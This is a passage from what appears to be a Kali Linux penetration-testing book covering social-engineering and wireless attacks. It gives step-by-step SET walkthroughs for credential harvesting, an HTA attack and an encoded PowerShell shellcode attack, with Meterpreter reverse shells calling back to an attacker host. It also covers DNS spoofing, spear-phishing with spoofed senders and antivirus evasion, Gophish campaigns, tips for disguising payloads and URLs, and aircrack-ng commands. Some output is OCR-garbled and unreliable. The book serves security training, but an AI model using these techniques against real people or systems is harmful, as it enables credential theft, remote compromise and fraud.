still visible). If the users enter their usernames and passwords, the data will be posted to the listener on the attacker's system. As you can see in the following screenshot, it has captured the username and the password:

| [M] WE GOT A HIT! Printing the output: | |
|---|--|
| PARAM: lsd=AVrHjTSO | |
| PARAM: display= | |
| PARAM: enable profile selector= | |
| PARAM: isprivate= | |
| PARAM: legacy return=0 | |
| PARAM: profile selector ids= | |
| PARAM: return session= | |
| POSSTRUE USERMANE ETELO EDUND: skin and Innine | |
| PARAM: signed next= | |
| PARAM: trypun=1 | |
| DADAM: timezone480 | |
| PADAM: Landia-aulitiovOTTv/ClatiovMDav/ClbdvISMTkvMCviVWaiDiEvMDAcTmMiDiIDfD- | |
| DADAM, Langed-225244 Au/h | |
| PARATE LIGHT HU=220044 RYZH DADAWA Lansa 2402365242 | |
| PARAMI LGN 5=1497703243 | |
| RUSSIBLE USERNARE FIELD FUUND: ERGIL=VIJAYK | |
| POSSIBLE PASSWORD FIELD FUUND: pass=vetu | |
| L'I WHEN YOU RE FINISHED, HIT CONTROL C TO GENERATE A REPORT. | |
| | |

The Hail Mary attack for website attack vectors is multi-attack web method that allows the attacker to implement several different attacks at one time, should they choose to. By default, all attacks are disabled, and the attacker chooses the ones to run against the victim, as shown in the following screenshot:

```
Multi-Attack Web Attack Vector
The multi attack vector utilizes each combination of attacks
and allow the user to choose the method for the attack. Once
you select one of the attacks, it will be added to your
attack profile to be used to stage the attack vector. When
your finished be sure to select the 'I'm finished' option.
Select which attacks you want to use:

    Java Applet Attack Method (OFF)

  2. Metasploit Browser Exploit Method (OFF)
  3. Credential Harvester Attack Method (OFF)
  4. Tabnabbing Attack Method (OFF)
  5. Web Jacking Attack Method (OFF)
  6. Use them all - A.K.A. 'Tactical Nuke'
  7. I'm finished and want to proceed with the attack
 99. Return to Main Menu
```

This is an effective option if you are unsure which attacks will be effective against a target organization; select one employee, determine the successful attack(s), and then reuse these against the other employees.
HTA attack

This type of attack is a simple HTML application that can provide full access to the remote attacker. The usual file extension of an HTA is .nta. An HTA is treated like any executable file with the extension .exe. When executed via <code>mshta.exe</code> (or if the file icon is double-clicked), it runs immediately. When executed remotely via the browser, the user is asked once, before the HTA is downloaded, whether or not to save and run the application; if saved, it can simply be run on demand after that.

An attacker can create a malicious application for the Windows operating system using web technologies. To launch an HTA attack using SEToolkit, select 1) Social-Engineering Attacks from the main menu. Then, select 2) Website Attack Vectors from the next menu and select 8) HTA Attack Method, followed by option 2) site cloner to clone any website. In this case, we will clone facebook.com, as shown in the following screenshot:

```
set:webattack>2
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:facebook.com
[*] HTA Attack Vector selected. Enter your IP, Port, and Payload ...
Enter the IP address for the reverse payload (LHOST): 192.168.0.116
Enter the port for the reverse payload [443]: 443
Select the payload you want to deliver:
 1. Meterpreter Reverse HTTPS
 2. Meterpreter Reverse HTTP
  3. Meterpreter Reverse TCP
Enter the payload number [1-3]: 1
[*] Generating powershell injection code and x86 downgrade attack...
[*] Reverse HTTPS takes a few seconds to calculate. One moment...
No encoder or badchars specified, outputting raw payload
Payload size: 357 bytes
```

Attackers will now send the server with the fake <code>facebook.com</code> to the victim users to phish for information; the following screenshot depicts what a victim would see:



If the victim user runs the HTA file locally on the system, this will open up the reverse connection to the attackers, as shown in the following screenshot. SEToolkit should automatically set up with a listener from Metasploit:

```
Processing /root/.set//meta config for ERB directives.
resource (/root/.set//meta config)> use multi/handler
resource (/root/.set//meta config)> set payload windows/meterpreter/reverse http
payload => windows/meterpreter/reverse https
resource (/root/.set//meta config)> set LHOST 192.168.0.116
LHOST => 192.168.0.116
resource (/root/.set//meta config)> set LPORT 443
LPORT => 443
resource (/root/.set//meta config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set//meta config)> set EnableStageEncoding true
EnableStageEncoding => true
resource (/root/.set//meta config)> exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://192.168.0.116:443
[*] Starting the payload handler...
[*] https://192.168.0.116:443 handling request from 192.168.0.119; (UUID: 5lusos
msf exploit(handler) > [*] Meterpreter session 1 opened (192.168.0.116:443 -> 19
0400
msf exploit (handler) > sessions
Active sessions
      Id Type
                              Information
                                                   Connection
  1 meterpreter x86/windows victim\EISC # VICTIM 192.168.0.116:443 -> 192.16
```

Using the PowerShell alphanumeric shellcode injection attack

The Social Engineering Toolkit also incorporates more effective attacks based on PowerShell, which is available on all Microsoft operating systems after the release of Microsoft Windows Vista. Because PowerShell shell code can easily be injected into the target's physical memory, attacks using this vector do not trigger antivirus alarms.

To launch a PowerShell injection attack using SEToolkit, select 1) social-Engineering Attacks from the main menu. Then, select 10) PowerShell AttackVectors from the next menu.

This will give the attacker four options for attack types; for this example, select 1 to invoke PowerShell alphanumeric shellcode injector.

This will set the attack parameters and prompt the attacker to enter the IP address for the payload listener, which will usually be the IP address of the attacker. When this has been entered, the program will create the exploit code and start a local listener.

The PowerShell shellcode that launches the attack is stored at /root/.set/reports/ powershell/x86_powershell_injection.txt. The social engineering aspect of the attack occurs when the attacker convinces the intended victim to copy the contents of x86_powershell_injection.txt into a command prompt, as shown in the following screenshot, and execute the code: root%kali:~/.set/reports/powershell# cat x86_powershell_injection.txt powershell -w 1 -C "sv K -;sv jA ec;sv ko ((gv K).value.toString()+(gv jA) ring() 'JABOAFKAQGBOACAAPQAGACCAJAB3AE8AWGAGADOAIAANACCAWW8EAGWADABJAGOACA ApAFOACAB1AGIADABPAGMAIABZAHQAYQBOAGKAYWAGAGUACABOAGUACGBUACAASQBUAHQAUABO AFAAdAByACAADABWAEEAZABKAHIAZQBZAHMALAAGAHUAaQBUAHQAIABKAHCAUW8PAHOAZQASAC QAeQBWAGUALAAGAHUAaQBUAHQAIABBAAGWAUAByAG8AdAB1AGMAdAAPADsAWW8EAGWADABJAGOA IgApaFOACAB1AGIADABpAGMAIABZAHQAYQBOAGKAYWAGAGUACABOAGUACgBUACAASQBUAHQAUAB BOAFAAdAByACAADABWAFQAaABYAGUAYQBOAGKAYWAGAGUACAB0AGUAcgBUACAASQBUAHQAUA BOAFAAdAByACAADABWAFQAaABYAGUAYQBKAEEAdABOAHIAaQBiAHUAAQBIAHMALAAGAHUAAQBU AFAAdAByACAADABWAFQAaABYAGUAYQBKAEEAdABOAHIAaQBiAHUAAdB1AHMALAAGAHUAAQBU AFAAdAByACAADABWAFMAdABAAHIAdABBAAGQAZABYAGUAcwBZACWAIABJAG4AdABQAHQACGAGAG QAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZWBZACWAIABJAG4AdABQAHQAcgAGAGACABUAGGA KAAiAGOAcwB2AGMAcgBOAC4AZABsAGwAIgApAFOACAB1AGIADABPAGMAIABZAHQAYQBOAGKAYw

As shown in the following screenshot, execution of the shellcode did not trigger an antivirus alarm on the target system. Instead, when the code was executed, it opened a Meterpreter session on the attacking system and allowed the attacker to gain an interactive shell with the remote system:

| [*] S [*] S msf e 95853 | <pre>tarted HTTPS reverse hand tarting the payload handl xploit(handler) > [*] htt 1 bvtes)</pre> | ller on https://0.0.0.0 er ps://0.0.0.0:443 handl |):443 ling request f |
|----------------------------------|--|---|-------------------------|
| [*] M | eterpreter session 1 open | ed (192.168.0.116:443 | -> 192.168.0. |
| <u>msf</u> e Activ | <pre>xploit(handler) > session e sessions </pre> | 15 | |
| Id | Туре | Information | Connection |
| 1 | meterpreter x86/windows | victim\EISC @ VICTIM | 192.168.0.11 |

Hiding executables and obfuscating the attacker's URL

As shown in the previous examples, there are two keys to successfully launching a social engineering attack. The first is to obtain the information needed to make it work: usernames, business information, and supporting details about networks, systems, and applications.

However, the majority of the work effort is focused on the second aspect: crafting the attack to entice the target into opening an executable or clicking on a link.

Several attacks produce modules that require the victim to execute them in order for the attack to succeed. Unfortunately, users are increasingly wary about executing unknown software. However, there are some ways to increase the possibility of successful attack execution, including the following:

- Attack from a system that is known and trusted by the intended victim, or spoof the source of the attack. If the attack appears to originate from the help desk or IT support, and claims to be an urgent software update, it will likely be executed:
 - Rename the executable to resemble the trusted software, such as Java Update.
 - Embed the malicious payload into a benign file, such as a PDF file, using an attack such as Metasploit's adobe_pdf_embedded_exe_nojs attack.
 - Executables can also be bound to Microsoft Office files, MSI install files, or BAT files configured to run silently on the desktop.
 - Have the user click on a link that downloads the malicious executable.
- Since the SET uses the attacker's URL as the destination for its attacks, a key success factor is to ensure that the attacker's URL is believable to the victim. There are several techniques to accomplish this, including the following:
 - Shorten the URL using a service such as https://goo.gl/Or tinyurl.com. These shortened URLs are common among social media platforms such as Twitter, and victims rarely use precautions when clicking on

such links.

- Enter the link on a social media site such as Facebook or LinkedIn; the site will create its own link to replace yours, with an image of the destination page. Then, remove the link that you entered, leaving behind the new social media link.
- Create a fake web page on LinkedIn or Facebook; as the attacker, you control the content, and can create a compelling story to drive members to click on links or download executables. A well executed page will not only target employees, but also vendors, partners, and their clients, maximizing the success of a social engineering attack.

Escalating an attack using DNS redirection

If an attacker or penetration tester has compromised a host on the internal network, they can escalate the attack using DNS redirection. This is generally considered to be a horizontal attack (it compromises persons of roughly the same access privileges); however, it can also escalate vertically if the credentials from privileged persons are captured. In this example, we will use BetterCap, which acts as a sniffer, interceptor, and logger for switched LANs. It facilitates man-inthe-middle attacks, but we will use it to launch a DNS-redirection attack to divert users to sites used for our social engineering attacks.

To start the attack, the following options are available in the new version of BetterCap:

Modules

| any.proxy | > | not running |
|---------------|---|-------------|
| api.rest | > | not running |
| arp.spoof | > | not running |
| ble.recon | > | not running |
| caplets | > | not running |
| dhcp6.spoof | > | not running |
| dns.spoof | > | not running |
| events.stream | > | running |
| gps | > | not running |
| http.proxy | > | not running |
| http.server | > | not running |
| https.proxy | > | not running |
| mac.changer | > | not running |
| mysql.server | > | not running |
| net.probe | > | not running |
| net.recon | > | running |
| net.sniff | > | not running |
| packet.proxy | > | not running |
| syn.scan | > | not running |
| tcp.proxy | > | not running |
| ticker | > | not running |
| update | > | not running |
| wifi | > | not running |
| wol | > | not running |

We should be able to activate any module that is required; for example, we will now try the DNS spoof attack module on the target by creating a file called dns.conf with the IP and domain details shown in the following screenshot. This will enable any request to microsoft.com on the network to be forwarded to 192.168.0.13. We will explore BetterCap more in chapter 11, Action on the Objective and Lateral Movement:

| root#kali:/# cat dns.conf 192.168.0.13 www.microsoft.com root#kali:/# bettercap bettercap v2.10 (type 'help' for a list of commands) |
|---|
| 192 158 5 0/24 > 192.168.0.24 > [18:06:58] [endpoint.new] endpoint 192.168.0.20 detected |
| orate). |
| 192 158 0.0/24 > 192.168.0.24 > [18:06:58] [endpoint.new] endpoint 192.168.0.13 detected |
| |
| 192.158.0.0/24 > 192.168.0.24 > set dns.spoof.hosts dns.conf |
| 192.158.0.0/24 > 192.160.0.24 > dns.spcof on |
| [18:07:14] [sys.log] [inf] loading hosts from file dns.conf |
| [18:07:14] [sys.log] [ing] [dns.spoof] www.microsoft.com -> 192.168.0.13 |
| 192.158.0.0/24 > 192.168.0.24 * [18:07:14] [#y#.log] [im] Enabling forwarding. |
| 192.150.0.0/24 > 192.168.0.24 . |

Spear phishing attack

Phishing is an email fraud attack carried out against a large number of victims, such as a list of known American internet users. The targets are generally not connected, and the email does not attempt to appeal to any specific individual.

Instead, it contains an item of general interest (for example, "*Click here for bargain medication*") and a malicious link or attachment. The attacker plays the odds that at least some people will click on the link attachment to initiate the attack.

On the other hand, spear phishing is a highly specific form of phishing attack; by crafting the email message in a particular way, the attacker hopes to attract the attention of a specific audience. For example, if the attacker knows that the sales department uses a particular application to manage its customer relationships, they may spoof an email pretending that it is from the application's vendor with a subject line of Emergency fix for <application> - Click link to download.

- 1. Before launching the attack, ensure that sendmail is installed on Kali (apt-get install sendmail) and change the set_config file from SENDMAIL=OFF to SENDMAIL=ON.
- 2. To launch the attack, select social Engineering Attacks from the main SET menu, and then select spear-Phishing Attack vectors from the submenu. This will launch the start options for the attack, as shown in the following screenshot:

The **Spearphishing** module allows you to specially craft email messages and send then to a large (or small) number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure "Sendmail" is installed (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat payload and use it in your own attack. Either way, good luck and enjoy!

- 1) Perform a Mass Email Attack
- 2) Create a FileFormat Payload
- 3) Create a Social-Engineering Template
- 3. Select 1 to perform a mass email attack; you will then be presented with a list of attack payloads, as shown in the following screenshot:

********* PAYLOADS *********

 SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) SET Custom Written Document UNC LM SMB Capture Attack MS15-100 Microsoft Windows Media Center MCL Vulnerability 4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087) 7) Adobe Flash Player "Button" Remote Code Execution 8) Adobe CoolType SING Table "uniqueName" Overflow Adobe Flash Player "newfunction" Invalid Pointer Use Adobe Collab.collectEmailInfo Buffer Overflow Adobe Collab.getIcon Buffer Overflow Adobe JBIG2Decode Memory Corruption Exploit 13) Adobe PDF Embedded EXE Social Engineering 14) Adobe util.printf() Buffer Overflow 15) Custom EXE to VBA (sent via RAR) (RAR required) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 17) Adobe PDF Embedded EXE Social Engineering (NOJS) 18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 19) Apple QuickTime PICT PnSize Buffer Overflow 20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 21) Adobe Reader u3D Memory Corruption Vulnerability 22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

4. The attacker can select any available payload, according to the attacker's knowledge of available targets gained during the reconnaissance phase. In this example, we will take an example of 7) Adobe Flash Player "Button" Remote Code Execution.

When you select 7, you will be prompted to select the payloads, as shown in the following screenshot. We have utilized Windows Meterpreter reverse shell HTTPS for this example:

| iet ip | eyloads)7 | |
|--------|---------------------------------------|---|
| | | |
| 1) | Windows Reverse TCP Shell | Spawn a command shell on victim and send back to attacker |
| 23 | Windows Meterpreter Reverse TCP | Spawn a meterpreter shell on victim and send back to attacker |
| 3) | Windows Reverse VNC DLL | Spawn a VNC server on victim and send back to attacker |
| 43 | Windows Reverse TCP Shell (x54) | Windows X64 Command Shell, Reverse TCE Inline |
| 53 | Windows Meterpreter Reverse TCP (X64) | Connect back to the attacker (Windows x64), Meterpreter |
| 6) | Windows Shell Bind TCP (X64) | fracute payload and create an accepting port on remote system |
| 71 | Windows Moterpreter Reverse HTTPS | Tunnel communication over HTTP using SSL and use Neterpreter |
| | | |

Once the payload and exploit is ready from the SET console, attackers will get the confirmation shown in the following screenshot:



- 5. Now, you will be able to rename the file by selecting option 2. Rename the file, I want to be cool.
- 6. Once you rename the file, you will be provided with two options to select, either E-mail Attack Single Email Address OF E-mail Attack Mass Mailer:

```
set:phishing>2
set:phishing> New filename:Payslip.pdf
[*] Filename changed, moving on...
Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.
What do you want to do:
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
99. Return to main menu.
```

7. Attackers can choose mass mailer or individually target a weaker victim, depending on their own choice. If we use a single email address, SET provides further templates that can be utilized by the attackers, as shown in the following screenshot:



8. After you select the phishing template, you will be offered the option of using your own Gmail account to launch the attack (1) or using your own server or open relay (2). If you use a Gmail account, it is likely that the attack will fail; Gmail inspects outgoing emails for malicious files and is very effective at identifying payloads produced by SET and the Metasploit framework. If you have to send a payload using Gmail, use Veil-Evasion to encode it first.

It is recommended that you use the sendmail option to send executable files; it allows you to spoof the source of the email to make it appear as though it originated from a trusted source.

To ensure that an email is effective, the attacker should take care of the following points:

• The content should provide a carrot (the new server will be faster, have improved antivirus) and a stick (changes you will have to make before you

can access your email). Most people respond to immediate calls for action, particularly when it affects them.

- In the sample given previously, the attached document is titled template.doc.
- In a real-world scenario, this would be changed to instructions.doc.
- Ensure that your spelling and grammar are correct, and the tone of the message matches the content.
- The title of the individual sending the email should match the content.
- If the target organization is small, you may have to spoof the name of a real individual and send the email to a small group that does not normally interact with that person.
- Include a phone number; it makes the email look more official, and there are various ways to use commercial voice over IP solutions to obtain a short-term phone number with a local area code.

Once the attack email is sent to the target, successful activation (the recipient launches the executable) will create a reverse Meterpreter tunnel to the attacker's system. The attacker will then be able to control the compromised system.

Setting up a phishing campaign with Gophish

Gophish is an integrated phishing framework with open source and also commercial support. The framework makes it easy for any type of user to quickly create a phishing campaign and deploy a sophisticated phishing simulation, or perform a real attack within a few minutes. Unlike SET, Gophish is not preinstalled in Kali Linux. In this section, we will explore how to set up the environment:

- 1. Download the right release, according to your system configuration, by visiting https://github.com/gophish/gophish/releases. In this book, we will utilize the gophish-v0.7.1 64-bit Linux version.
- 2. Once the app is download to Kali Linux, we will unzip the folder and configure the config.json file with the right information; attackers can choose to utilize any custom database, such as MySQL, MSSQL, and so on. We will use sqlite3 and an explicit IP address must be declared in listen_url if testers prefer to share the same resource over the LAN, as shown in the following screenshot. By default, it will be exposed only to localhost:

config.json





- 3. The next step is run the application in the Terminal using ./gophish; this should bring up BeEF web application portal on default port 3333 with a self-signed SSL certificate.
- 4. You should now be able to access the application by visiting https://yourIP:3333, as shown in the following screenshot, and you should now be able to log in with the user as admin and the password as gophish; it is recommended once you log in, you change the default password:





Please sign in

Usomamo

Password Sign in

Launching a phishing attack

There are prerequisites that need to be set up in Gophish before launching the phishing campaign. These can be broadly divided into four important things to do before launching a successful campaign:

- **Templates**: Templates are a very crucial part of phishing; you must be able to create your own templates based on your game plan. The most commonly used templates are Office365, Webmail, and internal Facebook and Gmail login. Some of the templates can be found at https://github.com/PacktPublishing/Mastering-Kali-Linux-for-Advanced-Penetration-Testing-Third-Edition/tree/master/Chapter05
- **Pages**: The effectiveness of the phishing will always relate to how you redirect the victims to a legitimate website using the landing pages.
- **Profiles**: A profile is the place where you will have all the SMTP details and sender details; Gophish allows attackers to have multiple profiles defined, along with custom email headers.
- **Users and groups**: Upload single or bulk targeted victims email IDs with their first and last names. Gophish allows testers to create groups and import them in CSV format.

Once the templates, landing pages, users, and sending profiles are set, we are now set to launch the campaign, as shown in the following screenshot. Attackers can also set the date and time of phishing and set the group of target victims. Gophish also provides an option to test an email to see whether it was blocked or delivered straight to the target's inbox:

| ← - C A Not socure h | нри//192.168.0.24 (3333/campoigns) | ÷ 0 ■ 1 |
|------------------------|---|--------------------|
| gophish | New Campaign | |
| Dashboarit | Ca NATE | |
| Campelgra / | Attack | γ |
| Lisers & Groups | Email Template: | |
| Email Templates | IT Administrator | |
| Landing Pages | Restamt Canding Page: | |
| Sending Profiles | Success | • |
| Settings | URLO | |
| | https://192.168.0.24 | |
| UserGuide | Launch Dote Send Emails By (Optional) 😡 | <u></u> |
| API Documentation | 11/15/2018 6:16 PM |] |
| | Sending Profiles | |
| | TargelCompany * | Elsend Test Encold |
| | Groups | |
| | * TargetCompany | |

Once the campaign is successfully launched, pen testers can now monitor the entire campaign in full detail, as shown in the following screenshot:



Using bulk transfer as a mode of phishing

Attackers can also utilize bulk file transfer software such as Send, Smash, Hightail, Terashare, WeTransfer, SendSpace, and DropSend.

Let's take a simple scenario: assume we have two victims, ceo and vijay. Attackers can simply send files between these two victims, visiting one of the bulk transfer website ceo@cyberhia.com as sender and vijay@cyberhia.com as receiver. Once the file is uploaded, both parties will receive the emails with the file link; in this case, ceo@cyberhia.com will receive an email stating your file is sent successfully, and vijay@cyberhia.com will receive something similar, as shown in the following screenshot. Sometimes, these bulk transfers are not on the blocked list in a corporate environment (if one is blocked, attackers can switch to another), so providing direct access to internal staff and creating an effective message and undetectable payload will provide a better success rate, without revealing the identity of the attackers:

```
You have been sent a file (Description: This is awesome)
```

sendspace mo-reply@sendapace.com* to me * Sendspace File Delivery Notification: You've got a file called goi phish PNG, (24.7 KB) waiting to be downloaded at <u>sendspace.com</u> (if was sent by ceo@Cyberhia.com). Description: This is alwesome You can use the following link to retrieve your file: <u>https://www.sendspace.com/file(56gOr</u>

The file may be available for a limited time only. If you have any questions, please visit the sendspace FAQ at https://www.sendspace.com.

Thank you,

sendspace.com - The best free file sharing service.

Summary

Social engineering is a method of hacking humans, taking advantage of a person's innate trust and helpfulness to attack a network and its devices.

In this chapter, we examined how social engineering can be used to facilitate attacks designed to harvest network credentials, activate malicious software, or assist in launching further attacks. Most of the attacks rely on SET and Gophish; however, Kali has several other applications that can be improved using a social engineering methodology. We explored how new bulk transfer companies can potentially be utilized to spread the payload without to having use any email services to perform phishing. We also examined how physical access, usually in conjunction with social engineering, can be used to place hostile devices on a target network.

In the next chapter, we will examine how to conduct reconnaissance against wireless networks, and attack open networks as well as networks that are protected with encryption schemes based on WPA2. We will also examine general weaknesses in wireless protocols that render them vulnerable to denial of service attacks, as well as impersonation attacks.

Wireless Attacks

With the dominance of mobile devices, the adoption of **Bring Your Own Devices (BYOD)** in companies, and the need to provide instant network connectivity, wireless networks have become the ubiquitous access point to the internet. Unfortunately, the convenience of wireless access is accompanied with an increase in effective attacks that result in the theft of data and unauthorized access, as well as the denial of service of network resources. Kali provides several tools to configure and launch these wireless attacks, allowing organizations to improve security.

In this chapter, we will examine several housekeeping tasks and wireless attacks, including the following topics:

- Configuring Kali for wireless attacks
- Wireless reconnaissance
- Bypassing a hidden Service Set Identifier (SSID)
- Bypassing the MAC address authentication and open authentication
- Compromising WPA/WPA2 encryption and performing **Man-in-The-Middle (MiTM)** attacks
- Attacking wireless routers with Reaver
- Denial-of-Service (DoS) attacks against wireless communication

Configuring Kali for wireless attacks

Kali Linux was released with several tools to facilitate the testing of wireless networks; however, these attacks require extensive configuration to be fully effective. In addition, testers should acquire a strong background in wireless networking before they implement attacks or audit a wireless network.

The most important tool in wireless security testing is the wireless adapter, which connects to the wireless access point. It must support the tools that are used, especially the aircrack-ng suite of tools; in particular, the card's chipset, and drivers must possess the ability to inject wireless packets into a communication stream. This is a requirement for attacks that require specific packet types to be injected into the traffic stream between the target and the victim. The injected packets can cause a DoS, allowing an attacker to capture handshake data that's needed to crack encryption keys or support other wireless attacks.

The aircrack-ng site (www.aircrack-ng.org) contains a list of known compatible wireless adapters.

The most reliable adapters that can be used with Kali are the Alfa Network cards, especially the **AWUS036NH** or **WiFi-pineapple** adapters, which support wireless 802.11 b, g, and n protocols. The Alfa cards are readily available online and will support all the tests and attacks that are delivered using Kali.

Wireless reconnaissance

The first step in conducting a wireless attack is to conduct reconnaissance—this identifies the exact target access point and highlights the other wireless networks that could impact testing.

If you are using a USB-connected wireless card to connect to a Kali virtual machine, make sure that the USB connection has been disconnected from the host operating system and that it is attached to the virtual machine by clicking on the USB connection icon, which is indicated by an arrow in the following screenshot:



Next, determine which wireless interfaces are available by running *iwconfig* from the command line, as shown in the following screenshot:

For certain attacks, you may wish to increase the power output of the adapter. This is especially useful if you are collocated with a legitimate wireless access point, and you want the targets to connect to a false access point under your control rather than the legitimate access point. These false, or **rogue**, access points allow an attacker to intercept data and to view or alter it as needed to support an attack. Attackers will frequently copy or clone a legitimate wireless site and then increase its transmission power compared to the legitimate site as a means of attracting victims. To increase power, the following command is used:

kali@linux:~# iwconfig wlan0 txpower 30

Many attacks will be conducted using aircrack-ng and its related tools. To start, we need to be able to intercept or monitor wireless transmissions; therefore, we need to set the Kali communication interface with wireless capabilities to monitor mode using the airmon-ng command:

kali@linux:~# airmon-ng start wlan0

The execution of the previous command is shown in the following screenshot:

| rootek | ali:—# airmon-ng | start wlan0 | |
|-------------------------------------|---|--|--|
| Found Kill t the ca and so | 4 processes that hem using 'airmo rd in monitor mo metimes putting | could cause to on-ng check kil ode, they will : the interface b | rouble. l' before putting interfere by changing channels back in managed mode |
| PID 536 597 1614 1704 | Name NetworkManager wpa_supplicant dhclient dhclient | | |
| PHY | Interface | Driver | Chipset |
| phy0 phy1 | wlan0mon wlan1 | iwlwifi rt2800usb | Intel Corporation Wireless 7265 (rev 99) Ralink Technology, Corp. RT2770 |

Note that the description that is returned indicates that there are some processes that could cause trouble. The most effective way to deal with these processes is to use a comprehensive kill command, as follows:

root@kali:~# airmon-ng check kill

To view the local wireless environment, use the following command:

root@kali:~# airodump-ng wlan0mon

The previous command lists all the identified networks that can be found within the range of the wireless adapter at that particular point of time. It provides the **Basic Service Set Identifier (BSSID)** of the wireless nodes on the network, as identified by the MAC addresses, an indication of the relative output power, information on data packets that have been sent, bandwidth information including the channel used and data, information on the encryption used, and the **Extended Service Set Identifier (ESSID)** that provides the name of the wireless network. This information is shown in the following screenshot; nonessential ESSIDs have been blurred out:

| CH 4][Elapsed: | 48 s |][2019-01-0 | 9 17:2 | 5 11 | inve | rted | sarti | ng orde | r | | |
|-------------------|------|--------------|--------|------|--------|------|-------|---------|-------|---|----|
| BSSID | PWR | Beacons | ₩Data, | #/s | CH | NB | ENC | CIPHER | AUTH | ESSID | |
| FA:8F:CA:3B:55:DB | -92 | 6 | Θ | θ | 11 | 65 | OPN | | | <length:< td=""><td>0></td></length:<> | 0> |
| 6A:FE:F7:A1:28:75 | -93 | 1 | 0 | 0 | 6 | 130 | WPA2 | CCMP | PSK | | |
| 38:35:F8:9A:9F:CC | -91 | 6 | 0 | 0 | 11 | 195 | WPA2 | CCMP | PSK | | |
| A4:71:74:F8:34:14 | -91 | 7 | Θ | Ð | 1 | 130 | WPAZ | CCMP | PSK | 9 | 12 |
| 7C:4C:A5:86:8A:61 | -87 | 8 | 5 | θ | 11 | 130 | WPA2 | CCMP | PSK | | |
| E4:3E:D7:B6:A2:A8 | -75 | 28 | 0 | .0 | 1 | 130 | WPA2 | CCMP | PSK | 1 | |
| 42:3E:07:86:A2:AA | -77 | 30 | 0 | 0 | 1 | 136 | WPA2 | CCMP | MGT | | |
| 42:3E:D7:86:A2:A9 | +75 | 33 | Θ | Θ | 1 | 130 | OPN | | | 0 | |
| B0:05:94:8D:40:53 | -51 | 60 | Θ | Ð | 6 | 130 | WPA2 | CCMP | PSK | fam. | |
| A0:8D:CD:64:9F:02 | -49 | 57 | 60 | 0 | . 6 | 130 | WPA2 | CCMP | PSK | SKY7C283 | |
| 3A:35:F8:9A:A1:CD | -92 | 3 | 0 | 9 | 11 | 195 | OPN | | | | |
| BSSID | STAT | ION | PWR | R | ŧte | Los | rt i | Frames | Prob | e | |
| 7C:4C:A5:86:8A:61 | 58:A | 6:7F:82:6F:8 | 85 | 1 | 2 - 24 | 10 | 0 | 2 | | | |
| A0:BD:CD:64:9F:02 | B0:0 | 5:94:80:40:5 | 3 -44 | | 9e- 8 | ie | 0 | 29 | | | |
| A0:80:C0:64:9F:02 | 00:6 | 4:20:FE:D7:2 | 5 -49 | 1 |)e- 0 | le. | 0 | 17 | | | |
| (not associated) | EA:2 | F:88:35:8A:4 | E -49 | | 1 - 1 | | 0 | 3 | | | |
| (not associated) | 46:5 | E:1F:7F:AF:7 | F -64 | 1 | - 1 | | 0 | 15 | Apple | e Setup | |
| (not associated) | 74:2 | 9:AF:34:48:0 | 5 -66 | 1 | 8 - 1 | | 0 | 2 | | | |
| (not associated) | 9E:6 | E:41:01:07:3 | 8 -71 | | 1 - 1 | | 0 | 6 | Apple | e Setup | |
| (not associated) | 90:0 | 4:73:94:24:1 | E -91 | (| 1 - 1 | | 0 | 2 | | | |

The airodump command cycles through the available wireless channels and identifies the following:

- The BSSID, which is the unique MAC address that identifies a wireless access point or router.
- The PWR, or power, of each network. Although airodump-ng incorrectly shows the power as being negative, this is a reporting artifact. To obtain the proper positive values, access a Terminal and run airdriver-ng unload 36, and then run airdriver-ng load 35.
- CH shows the channel that is being used to broadcast.
- ENC shows the encryption in use—it is OPN, or open, for no encryption being

used, or wep or wpa/wpa2 if encryption is being used. CIPHER and AUTH provide additional encryption information.

• The ESSID is the common name of the wireless network, and is made up of the access points that share the same SSID or name.

In the lower section of the Terminal window, you will see the stations attempting to connect, or that are connected to the wireless network.

Before we can interact with any of these (potential) target networks, we have to confirm that our wireless adapter is capable of packet injection. To do this, run the following command from a Terminal shell prompt:

```
|root@kali:~# aireplay-ng -9 wlan0mon
```

The execution of the previous command is shown in the following screenshot:

root@kali:~# aireplay-ng -9 wlan0mon 17:28:01 Trying broadcast probe requests... 17:28:03 No Answer... 17:28:03 Found 6 APs 17:28:03 Trying directed probe requests... 17:28:03 B0:05:94:8D:40:53 - channel: 6 - 'PS4-A9C05D7AE79A' 17:28:05 Ping (min/avg/max): 1.392ms/4.708ms/10.276ms Power: -42.82 17:28:05 17/30: 56% 17:28:05 Injection is working! 17:28:05 A0:BD:CD:64:9F:02 - channel: 6 - 'SKY7C283' 17:28:09 Ping (min/avg/max): 4.669ms/9.189ms/15.526ms Power: -42.00 17:28:09 14/30: 46% 17:28:09 38:35:FB:9A:9F:CC - channel: 11 - 'BTHub6-PW7H' 17:28:14 Ping (min/avg/max): 1.371ms/4.615ms/11.960ms Power: -93.00 17:28:14 4/30: 13% 17:28:14 6A:FE:F7:A1:2B:75 - channel: 6 - 'Paul Houston's iphone ' 17:28:20 0/30: 0% 17:28:20 42:3E:D7:B6:A2:A9 - channel: 1 - 'BTWifi-with-FON' 17:28:20 Ping (min/avg/max): 1.693ms/4.039ms/9.614ms Power: -77.00 17:28:20 30/30: 100%

Here, -9 indicates an injection test.

Kismet

One of the most important tools for wireless reconnaissance is Kismet, an 802.11 wireless detector, sniffer, and intrusion detection system.

Kismet can be used to gather the following information:

- The name of the wireless network, ESSID
- The channel of the wireless network
- The MAC address of the access point, BSSID
- The MAC address of the wireless clients

